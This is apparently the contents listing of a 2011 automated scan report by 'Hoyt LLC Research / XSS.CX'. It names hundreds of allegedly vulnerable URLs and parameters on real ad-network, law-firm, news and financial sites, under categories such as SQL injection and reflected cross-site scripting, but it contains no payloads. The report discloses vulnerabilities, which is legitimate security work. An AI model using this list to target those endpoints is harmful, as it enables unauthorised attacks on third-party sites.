XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05122011-02

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Thu May 12 08:15:19 CDT 2011.



1. SQL injection

1.1. http://da.newstogram.com/hg.php [DMUserTrack cookie]

1.2. http://googleads.g.doubleclick.net/pagead/ads [bpp parameter]

1.3. http://p.addthis.com/pixel [Referer HTTP header]

1.4. http://p.addthis.com/pixel [uid cookie]

1.5. http://www.pomerantzlaw.com/attorneys.html [attorneyID parameter]

1.6. http://www.pomerantzlaw.com/cases.html [CaseID parameter]

1.7. http://www.tuckerellis.com/ [name of an arbitrarily supplied request parameter]

1.8. http://www.tuckerellis.com/tucker-favicon.ico [REST URL parameter 1]

1.9. http://www.tuckerellis.com/tucker-favicon.ico [name of an arbitrarily supplied request parameter]

2. LDAP injection

3. HTTP header injection

3.1. http://ad.doubleclick.net/activity [REST URL parameter 1]

3.2. http://akatracking.esearchvision.com/esi/redirect2.html [esvaid parameter]

3.3. http://akatracking.esearchvision.com/esi/redirect2.html [esvcrea parameter]

3.4. http://amch.questionmarket.com/adscgen/sta.php [code parameter]

3.5. http://amch.questionmarket.com/adscgen/sta.php [site parameter]

4. Cross-site scripting (reflected)

4.1. http://207.56.166.97/favicon.ico [REST URL parameter 1]

4.2. http://207.56.166.97/javascript/c_smartmenus.js [REST URL parameter 1]

4.3. http://207.56.166.97/javascript/c_smartmenus.js [REST URL parameter 2]

4.4. http://ad.amtk-media.com/iframe [@CPSC@ parameter]

4.5. http://ad.amtk-media.com/iframe [@CPSC@ parameter]

4.6. http://ad.amtk-media.com/iframe [name of an arbitrarily supplied request parameter]

4.7. http://ad.amtk-media.com/iframe [name of an arbitrarily supplied request parameter]

4.8. http://ad.amtk-media.com/iframe [target parameter]

4.9. http://ad.amtk-media.com/iframe [target parameter]

4.10. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [ad parameter]

4.11. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [ad parameter]

4.12. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [camp parameter]

4.13. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [camp parameter]

4.14. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [goto parameter]

4.15. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [goto parameter]

4.16. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [name of an arbitrarily supplied request parameter]

4.17. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [name of an arbitrarily supplied request parameter]

4.18. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [opzn&page parameter]

4.19. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [opzn&page parameter]

4.20. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [pos parameter]

4.21. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [pos parameter]

4.22. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [sn1 parameter]

4.23. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [sn1 parameter]

4.24. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [sn2 parameter]

4.25. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [sn2 parameter]

4.26. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [snr parameter]

4.27. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [snr parameter]

4.28. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [snx parameter]

4.29. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [snx parameter]

4.30. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [sz parameter]

4.31. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [sz parameter]

4.32. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [ad parameter]

4.33. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [ad parameter]

4.34. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [camp parameter]

4.35. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [camp parameter]

4.36. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [goto parameter]

4.37. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [goto parameter]

4.38. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [name of an arbitrarily supplied request parameter]

4.39. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [name of an arbitrarily supplied request parameter]

4.40. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [opzn&page parameter]

4.41. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [opzn&page parameter]

4.42. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [pos parameter]

4.43. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [pos parameter]

4.44. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [sn1 parameter]

4.45. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [sn1 parameter]

4.46. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [sn2 parameter]

4.47. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [sn2 parameter]

4.48. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [snr parameter]

4.49. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [snr parameter]

4.50. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [snx parameter]

4.51. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [snx parameter]

4.52. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [sz parameter]

4.53. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [sz parameter]

4.54. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [ad parameter]

4.55. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [ad parameter]

4.56. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [camp parameter]

4.57. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [camp parameter]

4.58. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [goto parameter]

4.59. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [goto parameter]

4.60. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [name of an arbitrarily supplied request parameter]

4.61. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [name of an arbitrarily supplied request parameter]

4.62. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [opzn&page parameter]

4.63. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [opzn&page parameter]

4.64. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [pos parameter]

4.65. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [pos parameter]

4.66. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [sn1 parameter]

4.67. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [sn1 parameter]

4.68. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [sn2 parameter]

4.69. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [sn2 parameter]

4.70. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [snr parameter]

4.71. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [snr parameter]

4.72. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [snx parameter]

4.73. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [snx parameter]

4.74. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [sz parameter]

4.75. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [sz parameter]

4.76. http://ad.doubleclick.net/adj/fbn [name of an arbitrarily supplied request parameter]

4.77. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

4.78. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]

4.79. http://admeld.adnxs.com/usersync [admeld_callback parameter]

4.80. http://ads.adbrite.com/adserver/vdi/742697 [REST URL parameter 3]

4.81. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]

4.82. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]

4.83. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]

4.84. http://ads1.revenue.net/j [r_num parameter]

4.85. http://ads1.revenue.net/j [site_id parameter]

4.86. http://adserving.cpxinteractive.com/st [ad_size parameter]

4.87. http://adserving.cpxinteractive.com/st [pop_frequency parameter]

4.88. http://adserving.cpxinteractive.com/st [pop_times parameter]

4.89. http://adserving.cpxinteractive.com/st [section parameter]

4.90. https://ams-legal.net/support/Login.asp [userid parameter]

4.91. http://cgiwsc.enhancedsitebuilder.com/cgi-bin/AppLoader/AENDU0IN29GG/5000//20110401-102631 [REST URL parameter 3]

4.92. http://cgiwsc.enhancedsitebuilder.com/cgi-bin/AppLoader/AENDU0IN29GG/5000//20110401-102631 [REST URL parameter 5]

4.93. http://cgiwsc.enhancedsitebuilder.com/cgix/AppLoader.cls/AENDU0IN29GG/7008/16420/language%3Aen%3Bcountry%3AUS%3B [REST URL parameter 3]

4.94. http://cgiwsc.enhancedsitebuilder.com/cgix/AppLoader.cls/AENDU0IN29GG/7008/16420/language%3Aen%3Bcountry%3AUS%3B [REST URL parameter 4]

4.95. http://cgiwsc.enhancedsitebuilder.com/cgix/AppLoader.cls/AENDU0IN29GG/7008/25529/language%3Aen%3Bcountry%3AUS%3B [REST URL parameter 3]

4.96. http://cgiwsc.enhancedsitebuilder.com/cgix/AppLoader.cls/AENDU0IN29GG/7008/25529/language%3Aen%3Bcountry%3AUS%3B [REST URL parameter 4]

4.97. http://da.newstogram.com/hg.php [callback parameter]

4.98. http://da.newstogram.com/hg.php [name of an arbitrarily supplied request parameter]

4.99. http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/ [REST URL parameter 2]

4.100. http://dealbook.nytimes.com/category/main-topics/private-equity/ [REST URL parameter 2]

4.101. http://dealbook.nytimes.com/category/main-topics/venture-capital/ [REST URL parameter 2]

4.102. http://ds.addthis.com/red/psi/sites/www.csscorp.com/p.json [callback parameter]

4.103. http://ds.addthis.com/red/psi/sites/www.elawmarketing.com/p.json [callback parameter]

4.104. http://ds.addthis.com/red/psi/sites/www.pomerantzlaw.com/p.json [callback parameter]

4.105. http://img.mediaplex.com/content/0/15917/119013/OD_Promises_Domestic_300x250.js [mpck parameter]

4.106. http://img.mediaplex.com/content/0/15917/119013/OD_Promises_Domestic_300x250.js [mpck parameter]

4.107. http://img.mediaplex.com/content/0/15917/119013/OD_Promises_Domestic_300x250.js [mpjs parameter]

4.108. http://img.mediaplex.com/content/0/15917/119013/OD_Promises_Domestic_300x250.js [mpvc parameter]

4.109. http://img.mediaplex.com/content/0/15917/119013/OD_Promises_Domestic_300x250.js [mpvc parameter]

4.110. http://js.revsci.net/gateway/gw.js [csid parameter]

4.111. http://kona40.kontera.com/KonaGet.js [l parameter]

4.112. http://kona40.kontera.com/KonaGet.js [rId parameter]

4.113. http://lfov.net/webrecorder/g/chimera.js [vid parameter]

4.114. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]

4.115. http://r.turn.com/server/pixel.htm [fpid parameter]

4.116. http://r.turn.com/server/pixel.htm [sp parameter]

4.117. http://video.foxbusiness.com/v/feed/video/4674822.js [callback parameter]

4.118. http://wd.sharethis.com/api/getCount2.php [cb parameter]

4.119. http://wd.sharethis.com/api/getCount2.php [name of an arbitrarily supplied request parameter]

4.120. http://wd.sharethis.com/api/getCount2.php [url parameter]

4.121. http://webezines.kwithost.com/sx25Feed.php [callback parameter]

4.122. http://wolfgreenfield.com/favicon.ico [REST URL parameter 1]

4.123. http://wolfgreenfield.com/v_arrow.gif [REST URL parameter 1]

4.124. http://wolfgreenfield.com/v_arrow.gif [name of an arbitrarily supplied request parameter]

4.125. http://www.bloomberg.com/apps/data [sgid parameter]

4.126. http://www.butlerrubin.com/web/br.nsf/80868dabe98107a18525708000086fe1/$NavImagemap/0.52 [REST URL parameter 3]

4.127. http://www.butlerrubin.com/web/br.nsf/80868dabe98107a18525708000086fe1/$NavImagemap/0.52 [REST URL parameter 5]

4.128. http://www.butlerrubin.com/web/br.nsf/index [REST URL parameter 3]

4.129. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_01ov.jpg [REST URL parameter 3]

4.130. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_01ov.jpg [REST URL parameter 4]

4.131. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_01ov.jpg [REST URL parameter 5]

4.132. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_02ov.jpg [REST URL parameter 3]

4.133. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_02ov.jpg [REST URL parameter 4]

4.134. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_02ov.jpg [REST URL parameter 5]

4.135. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_03ov.jpg [REST URL parameter 3]

4.136. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_03ov.jpg [REST URL parameter 4]

4.137. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_03ov.jpg [REST URL parameter 5]

4.138. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_04ov.jpg [REST URL parameter 3]

4.139. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_04ov.jpg [REST URL parameter 4]

4.140. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_04ov.jpg [REST URL parameter 5]

4.141. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_05ov.jpg [REST URL parameter 3]

4.142. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_05ov.jpg [REST URL parameter 4]

4.143. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_05ov.jpg [REST URL parameter 5]

4.144. http://www.hbsr.com/contact_us/index [REST URL parameter 1]

4.145. http://www.hbsr.com/contact_us/index [REST URL parameter 2]

4.146. http://www.hbsr.com/contact_us/index [name of an arbitrarily supplied request parameter]

4.147. http://www.hbsr.com/favicon.ico [REST URL parameter 1]

4.148. http://www.hbsr.com/news_events/133-congratulations-finalists-invented-here-celebration-new-england [REST URL parameter 1]

4.149. http://www.hbsr.com/news_events/133-congratulations-finalists-invented-here-celebration-new-england [REST URL parameter 2]

4.150. http://www.hbsr.com/news_events/133-congratulations-finalists-invented-here-celebration-new-england [name of an arbitrarily supplied request parameter]

4.151. http://www.hbsr.com/news_events/index [REST URL parameter 1]

4.152. http://www.hbsr.com/news_events/index [REST URL parameter 2]

4.153. http://www.hbsr.com/news_events/index [name of an arbitrarily supplied request parameter]

4.154. http://www.hbsr.com/practices_technologies/biotechnology [REST URL parameter 1]

4.155. http://www.hbsr.com/practices_technologies/biotechnology [REST URL parameter 2]

4.156. http://www.hbsr.com/practices_technologies/biotechnology [name of an arbitrarily supplied request parameter]

4.157. http://www.hbsr.com/practices_technologies/index [REST URL parameter 1]

4.158. http://www.hbsr.com/practices_technologies/index [REST URL parameter 2]

4.159. http://www.hbsr.com/practices_technologies/index [name of an arbitrarily supplied request parameter]

4.160. http://www.hbsr.com/practices_technologies/software [REST URL parameter 1]

4.161. http://www.hbsr.com/practices_technologies/software [REST URL parameter 2]

4.162. http://www.hbsr.com/practices_technologies/software [name of an arbitrarily supplied request parameter]

4.163. http://www.hbsr.com/practices_technologies/telecommunications [REST URL parameter 1]

4.164. http://www.hbsr.com/practices_technologies/telecommunications [REST URL parameter 2]

4.165. http://www.hbsr.com/practices_technologies/telecommunications [name of an arbitrarily supplied request parameter]

4.166. http://www.pillsburylaw.com/connect_forgotpassword.cfm [name of an arbitrarily supplied request parameter]

4.167. http://www.pillsburylaw.com/connect_forgotpassword.cfm [p parameter]

4.168. http://www.pillsburylaw.com/index.cfm [name of an arbitrarily supplied request parameter]

4.169. http://www.stroock.com/sitecontent.cfm [contentID parameter]

4.170. http://www.wolfgreenfield.com/favicon.ico [REST URL parameter 1]

4.171. http://www.wolfgreenfield.com/industries_technologies/index [REST URL parameter 1]

4.172. http://www.wolfgreenfield.com/industries_technologies/index [REST URL parameter 2]

4.173. http://www.wolfgreenfield.com/industries_technologies/index [name of an arbitrarily supplied request parameter]

4.174. http://www.wolfgreenfield.com/industries_technologies/v_arrow.gif [REST URL parameter 1]

4.175. http://www.wolfgreenfield.com/industries_technologies/v_arrow.gif [REST URL parameter 2]

4.176. http://www.wolfgreenfield.com/industries_technologies/v_arrow.gif [name of an arbitrarily supplied request parameter]

4.177. http://www.wolfgreenfield.com/javascript/c_smartmenus.js [REST URL parameter 1]

4.178. http://www.wolfgreenfield.com/javascript/c_smartmenus.js [REST URL parameter 2]

4.179. http://www.wolfgreenfield.com/practices_services/internet-domain-names [REST URL parameter 1]

4.180. http://www.wolfgreenfield.com/practices_services/internet-domain-names [REST URL parameter 2]

4.181. http://www.wolfgreenfield.com/practices_services/internet-domain-names [name of an arbitrarily supplied request parameter]

4.182. http://www.wolfgreenfield.com/practices_services/v_arrow.gif [REST URL parameter 1]

4.183. http://www.wolfgreenfield.com/practices_services/v_arrow.gif [REST URL parameter 2]

4.184. http://www.wolfgreenfield.com/practices_services/v_arrow.gif [name of an arbitrarily supplied request parameter]

4.185. http://adserving.cpxinteractive.com/st [Referer HTTP header]

4.186. http://da.newstogram.com/hg.php [DMUserTrack cookie]

4.187. http://seg.sharethis.com/getSegment.php [__stid cookie]

4.188. http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros [meld_sess cookie]

4.189. http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros [meld_sess cookie]

4.190. http://trc.taboolasyndication.com/bloomberg/trc/2/json [taboola_user_id cookie]

4.191. http://www.pillsburylaw.com/index.cfm [PCUSERNAME cookie]

5. Flash cross-domain policy

5.1. http://ad.doubleclick.net/crossdomain.xml

5.2. http://ad.us.doubleclick.net/crossdomain.xml

5.3. http://apps.shareholder.com/crossdomain.xml

5.4. http://b.scorecardresearch.com/crossdomain.xml

5.5. http://bs.serving-sys.com/crossdomain.xml

5.6. http://by.optimost.com/crossdomain.xml

5.7. http://ds.serving-sys.com/crossdomain.xml

5.8. http://engine.cmmeglobal.com/crossdomain.xml

5.9. http://feeds.feedburner.com/crossdomain.xml

5.10. http://js.revsci.net/crossdomain.xml

5.11. http://pix04.revsci.net/crossdomain.xml

5.12. http://secure-us.imrworldwide.com/crossdomain.xml

5.13. http://wt.o.nytimes.com/crossdomain.xml

5.14. http://add.my.yahoo.com/crossdomain.xml

5.15. http://dealbook.nytimes.com/crossdomain.xml

5.16. http://googleads.g.doubleclick.net/crossdomain.xml

5.17. http://graphics8.nytimes.com/crossdomain.xml

5.18. http://markets.on.nytimes.com/crossdomain.xml

5.19. http://media.ft.com/crossdomain.xml

5.20. http://pagead2.googlesyndication.com/crossdomain.xml

5.21. http://pubads.g.doubleclick.net/crossdomain.xml

5.22. http://timespeople.nytimes.com/crossdomain.xml

5.23. http://www.facebook.com/crossdomain.xml

5.24. http://www.ft.com/crossdomain.xml

5.25. http://www.nytimes.com/crossdomain.xml

5.26. http://pillsburylaw.app4.hubspot.com/crossdomain.xml

5.27. http://stats.ft.com/crossdomain.xml

6. Silverlight cross-domain policy

6.1. http://ad.doubleclick.net/clientaccesspolicy.xml

6.2. http://ad.us.doubleclick.net/clientaccesspolicy.xml

6.3. http://b.scorecardresearch.com/clientaccesspolicy.xml

6.4. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

7. Cleartext submission of password

7.1. http://secniche.org:2082/tmp/secniche/webalizer//usage_201105.html

7.2. http://www.digiware.net/

7.3. http://www.huroncapital.com/secure/

7.4. http://www.pillsburylaw.com/

7.5. http://www.pillsburylaw.com/index.cfm

7.6. http://www.privateequityinfo.com/

7.7. http://www.privateequityinfo.com/forgotpassword.php

7.8. http://www.privateequityinfo.com/product_details.php

7.9. http://www.soundpatheview.com/

8. SSL cookie without secure flag set

8.1. https://ams-legal.net/support/default.asp

8.2. https://ams-legal.net/tuckerellis/Image.asp

8.3. https://ams-legal.net/tuckerellis/Login.asp

8.4. https://ams-legal.net/tuckerellis/default.asp

8.5. https://ams-legal.net/tuckerellis/default.asp

8.6. https://cle-files.tuckerellis.com/

8.7. https://cle-files.tuckerellis.com/password_reset

8.8. https://cle-files.tuckerellis.com/register

8.9. https://secure.reportingsystem.com/TPG/index.cfm

8.10. https://services.sungarddx.com/Default.aspx

8.11. https://services.sungarddx.com/common/js/AdminFunctions.asp

8.12. https://services.sungarddx.com/js/source.asp

8.13. https://webmail.tuckerellis.com/exchweb/bin/auth/owaauth.dll

8.14. https://ww3.janus.com/advisor/about-janus

8.15. https://www.usaa.com/inet/imco_mutualfund/ImMutualFunds

8.16. https://personal.vanguard.com/us/funds/snapshot

8.17. https://services.sungarddx.com/default.aspx

8.18. https://virtualoffice.tuckerellis.com/

8.19. https://ww3.janus.com/favicon.ico

8.20. https://www.wellsfargo.com/jump/theprivatebank/index

9. Session token in URL

9.1. http://by.optimost.com/counter/553/-/129/event.js

9.2. http://l.sharethis.com/pview

9.3. http://www.facebook.com/extern/login_status.php

10. Password field submitted using GET method

10.1. https://secure.reportingsystem.com/TPG/index.cfm

10.2. https://secure.reportingsystem.com/carlyle/

10.3. http://www.soundpatheview.com/

11. ASP.NET ViewState without MAC enabled

12. Open redirection

13. Cookie scoped to parent domain

13.1. http://convctr.overture.com/images/cc/cc.gif

13.2. http://foxbusiness.disqus.com/thread.js

13.3. https://personal.vanguard.com/us/funds/snapshot

13.4. http://www.dmoc.com/

13.5. http://www.elawmarketing.com/

13.6. http://www.korteco.com/

13.7. https://www.usaa.com/inet/imco_mutualfund/ImMutualFunds

13.8. http://ad.amtk-media.com/iframe

13.9. http://ad.doubleclick.net/clk

13.10. http://ad.turn.com/server/ads.js

13.11. http://admeld.adnxs.com/usersync

13.12. http://ads.adbrite.com/adserver/vdi/742697

13.13. http://ads.revsci.net/adserver/ako

13.14. http://ads.revsci.net/adserver/ako

13.15. http://ads.revsci.net/adserver/ako

13.16. http://ads.revsci.net/adserver/ako

13.17. http://ads.revsci.net/adserver/ako

13.18. http://ads.revsci.net/adserver/ako

13.19. http://ads.revsci.net/adserver/ako

13.20. http://ads1.revenue.net/j

13.21. http://ads1.revenue.net/load/227245/index.html

13.22. http://akatracking.esearchvision.com/esi/redirect.html

13.23. http://akatracking.esearchvision.com/esi/redirect2.html

13.24. http://altfarm.mediaplex.com/ad/js/15917-119013-26745-9

13.25. http://amch.questionmarket.com/adsc/d908257/6/911744/decide.php

13.26. http://amch.questionmarket.com/adsc/d909615/2/200214693344/decide.php

13.27. http://amch.questionmarket.com/adsc/d909615/2/200214693345/decide.php

13.28. http://amch.questionmarket.com/adsc/d909615/2/200214693346/decide.php

13.29. http://amch.questionmarket.com/adsc/d909615/2/912024/decide.php

13.30. http://amch.questionmarket.com/adsc/d909615/2/912025/decide.php

13.31. http://amch.questionmarket.com/adsc/d909615/2/912026/decide.php

13.32. http://amch.questionmarket.com/adsc/d909615/2/912027/decide.php

13.33. http://b.scorecardresearch.com/b

13.34. http://bs.serving-sys.com/BurstingPipe/adServer.bs

13.35. http://cf.addthis.com/red/p.json

13.36. http://core.insightexpressai.com/adServer/adServerESI.aspx

13.37. http://cspix.media6degrees.com/orbserv/hbpix

13.38. http://da.newstogram.com/hg.php

13.39. http://ds.addthis.com/red/psi/sites/www.elawmarketing.com/p.json

13.40. http://ds.addthis.com/red/psi/sites/www.pomerantzlaw.com/p.json

13.41. http://ib.adnxs.com/ptj

13.42. http://id.google.com/verify/EAAAAMuM38IiZaQMTv0qVSa50bs.gif

13.43. http://id.google.com/verify/EAAAAMvcQqr1NPgfDRpmfjdPxdo.gif

13.44. http://id.google.com/verify/EAAAAOW1EPjB-6m1cfgoaUZgYek.gif

13.45. http://id.google.com/verify/EAAAAPk-aVA72N8UD0L0g156sYY.gif

13.46. http://idpix.media6degrees.com/orbserv/hbpix

13.47. http://js.revsci.net/gateway/gw.js

13.48. http://m1463.ic-live.com/572/

13.49. http://marketing.csscorp.com/acton/bn/1090/visitor.gif

13.50. http://meter-svc.nytimes.com/meter.js

13.51. http://metrics.foxnews.com/b/ss/foxnewsbusinessprod/1/H.20.3/s19025191229302

13.52. http://odb.outbrain.com/utils/get

13.53. http://odb.outbrain.com/utils/ping.html

13.54. http://overseebroad.d.chango.com/c/t.js

13.55. http://pix04.revsci.net/D08734/a1/0/0/0.gif

13.56. http://pix04.revsci.net/E05510/b3/0/3/1003161/38529734.js

13.57. http://pix04.revsci.net/H07707/b3/0/3/0806180/203086575.js

13.58. http://pix04.revsci.net/H07707/b3/0/3/0806180/215595401.js

13.59. http://pix04.revsci.net/H07707/b3/0/3/0806180/225588936.js

13.60. http://pix04.revsci.net/H07707/b3/0/3/0806180/273184684.js

13.61. http://pix04.revsci.net/H07707/b3/0/3/0806180/293330189.js

13.62. http://pix04.revsci.net/H07707/b3/0/3/0806180/396037982.js

13.63. http://pix04.revsci.net/H07707/b3/0/3/0806180/513736918.js

13.64. http://pix04.revsci.net/H07707/b3/0/3/0806180/551354059.js

13.65. http://pix04.revsci.net/H07707/b3/0/3/0806180/562084143.js

13.66. http://pix04.revsci.net/H07707/b3/0/3/0806180/579814010.js

13.67. http://pix04.revsci.net/H07707/b3/0/3/0806180/590965522.js

13.68. http://pix04.revsci.net/H07707/b3/0/3/0806180/702365539.js

13.69. http://pix04.revsci.net/H07707/b3/0/3/0806180/71896167.js

13.70. http://pix04.revsci.net/H07707/b3/0/3/0806180/747456476.js

13.71. http://pix04.revsci.net/H07707/b3/0/3/0806180/848419951.js

13.72. http://pix04.revsci.net/H07707/b3/0/3/0806180/912026619.js

13.73. http://pix04.revsci.net/H07707/b3/0/3/0806180/949356899.js

13.74. http://pix04.revsci.net/H07707/b3/0/3/0806180/955065746.js

13.75. http://pix04.revsci.net/J07717/b3/0/3/1003161/451564742.js

13.76. http://pix04.revsci.net/K05539/b3/0/3/1003161/248479722.js

13.77. http://pixel.33across.com/ps/

13.78. http://pixel.quantserve.com/pixel

13.79. http://r.turn.com/r/bd

13.80. http://r.turn.com/r/beacon

13.81. http://r.turn.com/server/pixel.htm

13.82. http://segments.adap.tv/data/

13.83. http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6543457%22%20height=%221%22%20width=%221%22

13.84. http://tags.bluekai.com/site/668

13.85. http://topics.nytimes.com/topics/reference/timestopics/subjects/p/private_equity/index.html

13.86. http://track.ft.com/track/track.js

13.87. http://va.px.invitemedia.com/pixel

13.88. http://www.csscorp.com/

13.89. http://www.nytimes.com/adx/bin/adx_remote.html

13.90. https://www.wellsfargo.com/jump/theprivatebank/index

14. Cookie without HttpOnly flag set

14.1. https://ams-legal.net/support/default.asp

14.2. https://ams-legal.net/tuckerellis/Image.asp

14.3. https://ams-legal.net/tuckerellis/Login.asp

14.4. https://ams-legal.net/tuckerellis/default.asp

14.5. https://ams-legal.net/tuckerellis/default.asp

14.6. http://axley.com/

14.7. http://cgiwsc.enhancedsitebuilder.com/cgi-bin/counter.PicCount

14.8. http://cgiwsc.enhancedsitebuilder.com/extras/public/formular.cls/show

14.9. http://convctr.overture.com/images/cc/cc.gif

14.10. http://cpadominator.com/campaigns/index.php

14.11. http://foxbusiness.disqus.com/thread.js

14.12. http://generalatlantic.com/en/team/overview

14.13. http://m1463.ic-live.com/572/

14.14. https://personal.vanguard.com/us/funds/snapshot

14.15. http://privatemoneytalk.com/

14.16. http://revelations.trovus.co.uk/tracker/542.gif

14.17. https://secure.reportingsystem.com/TPG/index.cfm

14.18. https://services.sungarddx.com/common/js/AdminFunctions.asp

14.19. https://services.sungarddx.com/js/source.asp

14.20. http://trc.taboolasyndication.com/bloomberg/trc/2/json

14.21. https://webmail-us.mimecast.com/webMail/login.jsp

14.22. https://webmail.tuckerellis.com/exchweb/bin/auth/owaauth.dll

14.23. https://ww3.janus.com/advisor/about-janus

14.24. http://www.ams-legal.com/

14.25. http://www.apolloic.com/

14.26. http://www.conferenceservers.com/browser/proxy.asp

14.27. http://www.dmoc.com/

14.28. http://www.elawmarketing.com/

14.29. http://www.huroncapital.com/secure/

14.30. http://www.kkr.com/company/landmark_achievements.cfm

14.31. http://www.kkr.com/investor/investor_relations_overview.cfm

14.32. http://www.kkr.com/kpe/private_equity_overview.cfm

14.33. http://www.kkr.com/team/theteam.cfm

14.34. http://www.korteco.com/

14.35. http://www.milbank.com/en

14.36. http://www.pillsburylaw.com/

14.37. http://www.pillsburylaw.com/connect_forgotpassword.cfm

14.38. http://www.pillsburylaw.com/index.cfm

14.39. http://www.pillsburylaw.com/scripts/images/arrows-default.png

14.40. http://www.pomerantzlaw.com/cases.html

14.41. http://www.privateequityinfo.com/

14.42. http://www.privatemoneytalk.com/

14.43. http://www.provequity.com/

14.44. http://www.providenceequitypartners.com/

14.45. http://www.stroock.com/

14.46. https://www.usaa.com/inet/imco_mutualfund/ImMutualFunds

14.47. http://ad.amtk-media.com/iframe

14.48. http://ad.doubleclick.net/clk

14.49. http://ad.turn.com/server/ads.js

